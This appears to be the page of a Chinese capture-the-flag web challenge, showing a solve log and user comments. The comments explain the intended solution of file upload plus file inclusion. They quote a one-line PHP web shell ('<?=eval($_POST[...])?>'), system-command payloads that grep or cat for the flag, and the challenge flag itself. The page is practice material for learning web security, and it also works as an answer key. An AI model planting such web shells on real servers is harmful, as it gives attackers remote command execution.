评分(0)
暂无评分
解题动态
星期日 攻破了该题 50分钟前
billyjames 攻破了该题 2天前
Aurora* 攻破了该题 5天前
zhenmingshui 攻破了该题 7天前
温吞世俗人间烟火 攻破了该题 8天前
minz 攻破了该题 9天前
Misc大师兄 攻破了该题 9天前
xiemeimei 攻破了该题 9天前
张伯伦 攻破了该题 10天前
不嘻嘻123 攻破了该题 10天前
要加两个蛋 攻破了该题 10天前
lin123 攻破了该题 10天前
18354096589 攻破了该题 10天前
18353517196 攻破了该题 10天前
123!!! 攻破了该题 10天前
我要弗兰戈 攻破了该题 10天前
337556453 攻破了该题 10天前
z999 攻破了该题 12天前
yttitan 攻破了该题 18天前
评论
wywitkey 7月前
举报
3.上传一句话图片马,再用read.php?filename=读取你上传的文件,找到flag(一句话木马必须是system命令,这样在读取文件时才能执行),本题的flag在环境变量里,真是没想到.....
wywitkey 7月前
举报
1.看页面代码有提示:read.php?filename=;2.根据伪协议读取index.php代码及read.php代码,找到上传文件的过滤规则(上传文件不能有“php”,read不能有“flag”,上传的文件会被重新命名);
wywitkey 7月前
举报
前面的这几位没有一个说的靠谱,这不是单纯的upload题,还考了文件包含和命令注入 新手去看wp吧,2金币花得值。
ljt1016 9月前
举报
为什么这道题一句话木马上传成功后,无法用蚁剑连接,用正确的方法去访问上传的php文件,只会回显php的内容(即一句话木马)求师傅回答
silentiron 1年前
举报
0xGame{upl0ad_f1le_causes_danger!!!}
zhaiye 1年前
举报
0xGame{upl0ad_f1le_causes_danger!!!}
2728462336 2年前
举报
文件上传加文件包含,上传图片码内容为<?=eval($_POST[123]);?>,文件包含连接shell即可
倦鸟叫了一整天 1年前
举报
@206297162 连接上传的文件
206297162 1年前
举报
大佬改如何连接
不会编程的崽 2年前
举报
<?=system('grep -r "0xGame" / ')> <?=system('cat path')>